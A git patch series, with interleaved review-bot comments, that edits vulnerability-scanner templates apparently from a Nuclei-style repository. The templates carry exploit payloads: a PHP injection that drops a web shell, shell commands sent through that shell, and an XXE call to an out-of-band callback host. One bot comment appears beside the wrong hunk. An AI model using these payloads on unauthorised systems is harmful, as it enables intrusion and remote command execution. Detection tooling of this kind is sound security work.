From f1b20fd4de04517f9afe2669efbb439a00dc740a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 3 Nov 2025 22:18:04 +0530
Subject: [PATCH 1/4] =?UTF-8?q?Revert=20"[ENHANCEMENT]=20Removing=20charac?= =?UTF-8?q?ter=20=C2=A7"?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 http/cves/2023/CVE-2023-46818.yaml | 6 +++---
 http/cves/2025/CVE-2025-30220.yaml | 2 +-
 http/cves/2025/CVE-2025-52207.yaml | 2 +-
 3 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml
index 029dbe50e96..c202a426165 100644
--- a/http/cves/2023/CVE-2023-46818.yaml
+++ b/http/cves/2023/CVE-2023-46818.yaml
@@ -108,7 +108,7 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('{{echo-cmd}}')}}
+ C: {{base64('§echo-cmd§')}}
 matchers-condition: and
 matchers:
@@ -125,7 +125,7 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('rm {{lang_file_location}}')}}
+ C: {{base64('rm §lang_file_location§')}}
 matchers:
 - type: status
@@ -137,7 +137,7 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('rm {{websh-file}}')}}
+ C: {{base64('rm §websh-file§')}}
 matchers:
 - type: status
diff --git a/http/cves/2025/CVE-2025-30220.yaml b/http/cves/2025/CVE-2025-30220.yaml
index 33faa9a3ddd..b890838d0c9 100644
--- a/http/cves/2025/CVE-2025-30220.yaml
+++ b/http/cves/2025/CVE-2025-30220.yaml
@@ -82,7 +82,7 @@ http:
 xmlns:wfs="http://www.opengis.net/wfs"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
-
+
 matchers:
diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml
index b578da01614..9469a21a007 100644
--- a/http/cves/2025/CVE-2025-52207.yaml
+++ b/http/cves/2025/CVE-2025-52207.yaml
@@ -114,7 +114,7 @@ http:
 - method: GET
 path:
- - "{{BaseURL}}/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}"
+ - "{{BaseURL}}/pbxcore/files/cache/§extracted_path§?{{wait_for(3)}}"
 matchers:
 - type: dsl
From a90848eabd939de3db9270aa2efe5ca12e5c91a7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 3 Nov 2025 22:28:15 +0530
Subject: [PATCH 2/4] Fix echo command and base64 encoding in CVE-2023-46818.yaml
---
 http/cves/2023/CVE-2023-46818.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml
index c202a426165..b5f9ba9d5f1 100644
--- a/http/cves/2023/CVE-2023-46818.yaml
+++ b/http/cves/2023/CVE-2023-46818.yaml
@@ -34,7 +34,7 @@ variables:
 payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#"
 payload-url-enc: "{{url_encode(payload)}}"
 echo-cmd-hash: "{{rand_text_alphanumeric(32)}}"
- echo-cmd: "echo {{echo-cmd-hash}}"
+ echo-cmd: "echo (echo-cmd-hash}}"
 http:
 - raw:
@@ -108,7 +108,7 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('§echo-cmd§')}}
+ C: {{base64(echo-cmd)}}
 matchers-condition: and
 matchers:
@@ -125,7 +125,7 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('rm §lang_file_location§')}}
+ C: {{base64('rm ' + lang_file_location)}}
 matchers:
 - type: status
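Review bot: The new value `echo-cmd: "echo (echo-cmd-hash}}"` in the `@@ -34,7` hunk opens the placeholder with `(` instead of `{{`, so the random hash is never substituted and the request would carry the literal text. Any matcher that expects the generated hash in the response (the matcher lines are outside this hunk) could then not fire, which makes this revision a silent false negative. The line should read `echo-cmd: "echo {{echo-cmd-hash}}"`; patch 3/4 of this series makes exactly that correction, so squashing it into this commit would keep every intermediate revision usable.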
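Review bot: `echo-cmd` in `{{base64(echo-cmd)}}` (hunk `@@ -108,7`) is now a bare identifier inside a helper expression rather than a placeholder, and the same holds for `websh-file` in the `@@ -137,10` hunk. If the expression evaluator reads `-` as subtraction, as expression parsers commonly do, neither name resolves and the `C:` header is sent unevaluated or the request is skipped; `lang_file_location` in the `@@ -125,7` hunk has no hyphen and is not affected. Please confirm with a debug run against a lab instance that the header carries the expected base64, or rename the variables with underscores, e.g. `C: {{base64(echo_cmd)}}` with `echo_cmd` declared under `variables:` (that block is outside this hunk).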
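Review bot: Both cleanup requests (hunk `@@ -125,7` and hunk `@@ -137,10`) are accepted on `status: 200` alone, which presumably is what the dropped file returns whether or not the `rm` actually ran. If the rewritten `base64(...)` expression does not evaluate as intended, the scan ends with the dropped PHP file and the modified language file still present on the scanned host, and nothing in the output says so. A final request that expects the file to be gone would make leftover artefacts visible to the operator; the 404 below is an assumption about how the application answers for a missing file, and the request blocks start above the hunk, so the placement is approximate.

```yaml
# … unchanged: the two cleanup requests …
  - raw:
      - |
        GET /admin/{{websh-file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: status
        status:
          - 404
```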
@@ -137,10 +137,10 @@ http:
 GET /admin/{{websh-file}} HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
- C: {{base64('rm §websh-file§')}}
+ C: {{base64('rm ' + websh-file)}}
 matchers:
 - type: status
 status:
 - 200
-# digest: 4a0a00473045022100d8a79f4057cef91ca12ffbb2b00486ed861f5e744f7c4187490ea1b58c3e0640022047996bc3fe5ab6a4a7d2ffa15b44bdb045abdf08cd81c7d752cdf69a8b970216:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8a79f4057cef91ca12ffbb2b00486ed861f5e744f7c4187490ea1b58c3e0640022047996bc3fe5ab6a4a7d2ffa15b44bdb045abdf08cd81c7d752cdf69a8b970216:922c64590222798bb761d5b6d8e72950
From 59b3333f7677f26a2847c46cfc77675bc8191441 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 5 Nov 2025 12:50:59 +0530
Subject: [PATCH 3/4] Fix syntax error in CVE-2023-46818.yaml
---
 http/cves/2023/CVE-2023-46818.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml
index b5f9ba9d5f1..8db545207a8 100644
--- a/http/cves/2023/CVE-2023-46818.yaml
+++ b/http/cves/2023/CVE-2023-46818.yaml
@@ -34,7 +34,7 @@ variables:
 payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#"
 payload-url-enc: "{{url_encode(payload)}}"
 echo-cmd-hash: "{{rand_text_alphanumeric(32)}}"
- echo-cmd: "echo (echo-cmd-hash}}"
+ echo-cmd: "echo {{echo-cmd-hash}}"
 http:
 - raw:
From 6ec5e8b631fc98beb35ae1e4321546f4f138fa04 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 5 Nov 2025 12:54:00 +0530
Subject: [PATCH 4/4] fix {{ && }}
---
 http/cves/2025/CVE-2025-30220.yaml | 2 +-
 http/cves/2025/CVE-2025-52207.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2025/CVE-2025-30220.yaml b/http/cves/2025/CVE-2025-30220.yaml
index b890838d0c9..33faa9a3ddd 100644
--- a/http/cves/2025/CVE-2025-30220.yaml
+++ b/http/cves/2025/CVE-2025-30220.yaml
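Review bot: The `# digest:` line at the end of the `@@ -137,10` hunk is re-added with the same value it had before, gaining only a trailing newline, although this commit changes four other lines of the template. If the digest is a signature over the template body, as its position and format suggest, it no longer matches the content and the template would fail signature verification until it is re-signed. Either leave the line untouched here and let the signing job regenerate it, or regenerate it as part of this change; hand-editing the line should be avoided.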
@@ -82,7 +82,7 @@ http:
 xmlns:wfs="http://www.opengis.net/wfs"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
-
+
 matchers:
diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml
index 9469a21a007..b578da01614 100644
--- a/http/cves/2025/CVE-2025-52207.yaml
+++ b/http/cves/2025/CVE-2025-52207.yaml
@@ -114,7 +114,7 @@ http:
 - method: GET
 path:
- - "{{BaseURL}}/pbxcore/files/cache/§extracted_path§?{{wait_for(3)}}"
+ - "{{BaseURL}}/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}"
 matchers:
 - type: dsl
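Review bot: The `@@ -114,7` hunk restores `{{extracted_path}}` to exactly the text that patch 1/4 removed, and its index line `9469a21a007..b578da01614` is the mirror of `b578da01614..9469a21a007` in patch 1/4; the CVE-2025-30220.yaml hunk above mirrors its index pair the same way. Across the series these two files therefore end up unchanged, so the revert could have been limited to CVE-2023-46818.yaml and this commit dropped. If the series is merged as is, a subject more descriptive than `fix {{ && }}` would help anyone later bisecting a change in template behaviour.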